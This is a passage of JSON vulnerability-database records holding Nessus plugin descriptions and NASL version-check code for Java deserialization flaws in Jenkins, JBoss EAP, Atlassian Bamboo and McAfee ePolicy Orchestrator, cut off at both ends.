\"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"jenkins<=2.31\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"jenkins-lts<=2.19.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:42", "description": "Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "Fedora 25 : jenkins / jenkins-remoting (2016-368780879d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:jenkins", "p-cpe:/a:fedoraproject:fedora:jenkins-remoting", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2016-368780879D.NASL", "href": "https://www.tenable.com/plugins/nessus/95446", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-368780879d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95446);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9299\");\n script_xref(name:\"FEDORA\", value:\"2016-368780879d\");\n\n script_name(english:\"Fedora 25 : jenkins / jenkins-remoting (2016-368780879d)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-368780879d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins and / or jenkins-remoting packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Jenkins CLI HTTP Java Deserialization Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"jenkins-1.651.3-2.fc25\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"jenkins-remoting-2.62.3-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins / jenkins-remoting\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:18", "description": "An update is now available for Red Hat JBoss Enterprise Application Platform 5 for Red Hat Enterprise Linux 5 and Red Hat JBoss Enterprise Application Platform 5 for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis asynchronous patch is a security update for JBoss invoker in Red Hat JBoss Enterprise Application Platform 5.2.0.\n\nSecurity Fix(es) :\n\n* jbossas: Arbitrary code execution via unrestricted deserialization in ReadOnlyAccessFilter of HTTP Invoker. (CVE-2017-12149)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Joao F M Figueiredo for reporting this issue.", "cvss3": {}, "published": "2018-05-23T00:00:00", "type": "nessus", "title": "RHEL 6 : JBoss EAP (RHSA-2018:1607)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12149"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jbossas", "p-cpe:/a:redhat:enterprise_linux:jbossas-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-messaging", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-1607.NASL", "href": "https://www.tenable.com/plugins/nessus/109990", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1607. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109990);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-12149\");\n script_xref(name:\"RHSA\", value:\"2018:1607\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/10\");\n\n script_name(english:\"RHEL 6 : JBoss EAP (RHSA-2018:1607)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update is now available for Red Hat JBoss Enterprise Application\nPlatform 5 for Red Hat Enterprise Linux 5 and Red Hat JBoss Enterprise\nApplication Platform 5 for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform is a platform for Java\napplications based on the JBoss Application Server.\n\nThis asynchronous patch is a security update for JBoss invoker in Red\nHat JBoss Enterprise Application Platform 5.2.0.\n\nSecurity Fix(es) :\n\n* jbossas: Arbitrary code execution via unrestricted deserialization\nin ReadOnlyAccessFilter of HTTP Invoker. (CVE-2017-12149)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank Joao F M Figueiredo for reporting this\nissue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/documentation/en-us/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2018:1607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-12149\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12149\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1607\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-5.2.0-24.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-client-5.2.0-24.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-messaging-5.2.0-24.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-ws-native-5.2.0-24.ep5.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jbossas / jbossas-client / jbossas-messaging / jbossas-ws-native\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:45", "description": "According to its self-reported version number, the instance of Atlassian Bamboo running on the remote host is version 2.2.x prior to 5.8.5 or 5.9.x prior to 5.9.7. It is, therefore, affected by an unspecified resource deserialization flaw due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to execute arbitrary Java code. Note that the attacker must be able to access the Bamboo web interface.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2015-11-04T00:00:00", "type": "nessus", "title": "Atlassian Bamboo 2.2.x < 5.8.5 / 5.9.x < 5.9.7 Unspecified Resource Deserialization RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6576"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:bamboo"], "id": "BAMBOO_5_8_5.NASL", "href": "https://www.tenable.com/plugins/nessus/86721", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86721);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-6576\");\n script_bugtraq_id(77292);\n\n script_name(english:\"Atlassian Bamboo 2.2.x < 5.8.5 / 5.9.x < 5.9.7 Unspecified Resource Deserialization RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of\nAtlassian Bamboo running on the remote host is version 2.2.x prior to\n5.8.5 or 5.9.x prior to 5.9.7. It is, therefore, affected by an\nunspecified resource deserialization flaw due to improper validation\nof user-supplied input. An unauthenticated, remote attacker can\nexploit this to execute arbitrary Java code. Note that the attacker\nmust be able to access the Bamboo web interface.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/bamboo/bamboo-security-advisory-2015-10-21-785452575.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?70364dac\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/BAM-16439\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Bamboo version 5.8.5 / 5.9.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6576\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:bamboo\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bamboo_detect.nbin\");\n script_require_keys(\"installed_sw/bamboo\");\n script_require_ports(\"Services/www\", 8085);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Bamboo\";\napp_name = tolower(app);\n\nget_install_count(app_name:app_name, exit_if_zero:TRUE);\n\nport = get_http_port(default:8085);\n\ninstall = get_single_install(\n app_name : app_name,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nversion = install['version'];\n\ninstall_url = build_url(port:port, qs:dir);\nvuln = FALSE;\n\nif (version =~ \"^5\\.[89]$\")\n audit(AUDIT_VER_NOT_GRANULAR, app, port, version);\n\nif (version =~ \"^(2\\.[2-9]|[34]\\.|5\\.[0-7]($|\\.|[^0-9]))\")\n{\n vuln = TRUE;\n fix_ver = \"5.8.5 / 5.9.7\";\n}\nelse if (version =~ \"^5\\.8\\.[0-4]($|[^0-9])\")\n{\n vuln = TRUE;\n fix_ver = \"5.8.5\";\n}\nelse if (version =~ \"^5\\.9\\.[0-6]($|[^0-9])\")\n{\n vuln = TRUE;\n fix_ver = \"5.9.7\";\n}\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix_ver + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:12", "description": "The McAfee ePolicy Orchestrator (ePO) installed on the remote Windows host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this to execute arbitrary code on the target host.", "cvss3": {}, "published": "2016-02-08T00:00:00", "type": "nessus", "title": "McAfee ePolicy Orchestrator Java Object Deserialization RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8765"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:mcafee:epolicy_orchestrator"], "id": "MCAFEE_EPO_SB10144.NASL", "href": "https://www.tenable.com/plugins/nessus/88624", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n {\nscript_id(88624);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2015-8765\");\n script_bugtraq_id(85696);\n script_xref(name:\"CERT\", value:\"576313\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10144\");\n\n script_name(english:\"McAfee ePolicy Orchestrator Java Object Deserialization RCE\");\n script_summary(english:\"Checks registry/fs for the common-collections version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A security management application installed on the remote Windows host\nis affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The McAfee ePolicy Orchestrator (ePO) installed on the remote Windows\nhost is affected by a remote code execution vulnerability due to\nunsafe deserialize calls of unauthenticated Java objects to the Apache\nCommons Collections (ACC) library. An unauthenticated, remote attacker\ncan exploit this to execute arbitrary code on the target host.\");\n # https://kc.mcafee.com/corporate/index?page=content&id=SB10144#remediation\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?857cd252\");\n # https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26308/en_US/ReleaseNotes_epo5xHF1106041.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0f7a4795\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ \n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to McAfee ePO version 5.1.3 / 5.3.1 and then apply hotfix\nEPO5xHF1106041.zip. A patch for ePO version 5.1.4 is scheduled to be\nreleased in Q2 of 2016.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:epolicy_orchestrator\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_epo_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\",\"installed_sw/McAfee ePO\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"McAfee ePO\";\ninstall = get_single_install(\n app_name : app_name,\n exit_if_unknown_ver : FALSE\n);\ndir = install['path'];\nver = install['version'];\nreport = NULL;\n\n# Check version of common-collections jar\njar_path = hotfix_append_path(path:dir, value:\"Installer\\\\Core\\\\lib\");\nshare = hotfix_path2share(path:jar_path);\nbasedir = ereg_replace(string:jar_path, pattern:\"^\\w:(.*)\", replace:\"\\1\");\njars = list_dir(basedir:basedir, level:1, file_pat:\"commons-collections.*\\.jar$\", share:share);\nif (isnull(jars)) \n{\n exit(1, \"No commons-collections jar file found.\");\n}\nmatch = eregmatch(string:jars[0], pattern:\"commons\\-collections\\-([0-9\\.]+)\\.jar$\");\n\nhotfix_check_fversion_end();\nif (isnull(match))\n{\n exit(1,\"A commons-collections jar file exists, however it does not have a version.\");\n}\n\nif(ver_compare(ver:match[1], fix:\"3.2.2\", strict:FALSE) < 0)\n {\n report =\n '\\n Application: McAfee ePolicy Orchestrator ' + ver +\n '\\n Path : ' + jar_path +\n '\\n Version : ' + match[1]+\n '\\n Fix : Upgrade to 5.1.3 or 5.3.1 and then apply\n hotfix EPO5xHF1106041.zip.\n For ePO 5.1.4, contact Vendor.';\n } else {\n audit(AUDIT_INST_VER_NOT_VULN, app_name + ver + \"commons-collections jar\", match[1]);\n}\n\nif (isnull(report))\n audit(AUDIT_UNINST, 'McAfee ePO');\n\nport = kb_smb_transport();\n\nif (report_verbosity > 0)\n security_hole(port:port, extra:report);\nelse\n security_hole(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:20:11", "description": "An update is now available for Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 5.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {}, "published": "2017-05-22T00:00:00", "type": "nessus", "title": "RHEL 5 : JBoss EAP (RHSA-2017:1256)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9606"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6", "p-cpe:/a:redhat:enterprise_linux:hornetq", "p-cpe:/a:redhat:enterprise_linux:httpserver", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6", "p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient", "p-cpe:/a:redhat:enterprise_linux:jboss-as-cli", "p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all", "p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering", "p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp", "p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin", "p-cpe:/a:redhat:enterprise_linux:jboss-as-connector", "p-cpe:/a:redhat:enterprise_linux:jboss-as-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client", "p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security", "p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository", "p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner", "p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http", "p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ee", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3", "p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded", "p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs", 